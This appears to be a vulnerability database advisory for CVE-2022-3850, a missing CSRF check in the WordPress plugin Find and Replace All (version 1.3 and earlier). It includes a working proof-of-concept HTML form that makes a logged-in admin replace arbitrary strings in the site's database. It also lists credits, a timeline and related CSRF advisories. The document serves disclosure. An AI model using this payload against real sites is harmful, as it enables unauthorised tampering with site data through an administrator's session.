Find and Replace All <= 1.3 – Arbitrary Replacement via CSRF | CVE 2022-3850 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check when replacing string, which could allow attackers to make a logged admin replace arbitrary string in database tables via a CSRF attack

Proof of Concept

Make a logged in admin open a page with the below code

<html>
<body>
<form action="http://vulnerable-site.tld/wp-admin/admin.php?page=frasettings" method="POST">
<input type="hidden" name="findstr" value="Str-To-Replace" />
<input type="hidden" name="replacestr" value="Replaced-via-CSRF">
<input type="hidden" name="submit" value="Replace Now" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Affects Plugins

find-and-replace-all

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Vinay Varma Mudunuri, Krishna Harsha Kondaveeti

Submitter

Vinay Varma Mudunuri

Verified

Yes

WPVDB ID

8ae42ec0-7e3a-4ea5-8e76-0aae7b92a8e9

Timeline

Publicly Published

2022-11-03 (about 1 years ago)

Added

2022-11-03 (about 1 years ago)

Last Updated

2022-11-03 (about 1 years ago)

Other

Published

Title

Published

2022-01-24

Title

Access Demo Importer < 1.0.8 - Data Reset via CSRF

Published

2024-04-15

Title

Paid Memberships Pro < 3.0.2 - Cross-Site Request Forgery

Published

2023-02-07

Title

Slider by Supsystic < 1.8.7 - CSRF

Published

2023-03-16

Title

Event Manager for WooCommerce < 3.7.8 - Cross-Site Request Forgery (CSRF)

Published

2022-09-23

Title

Kraken.io Image Optimizer < 2.6.6 - Settings Update via CSRF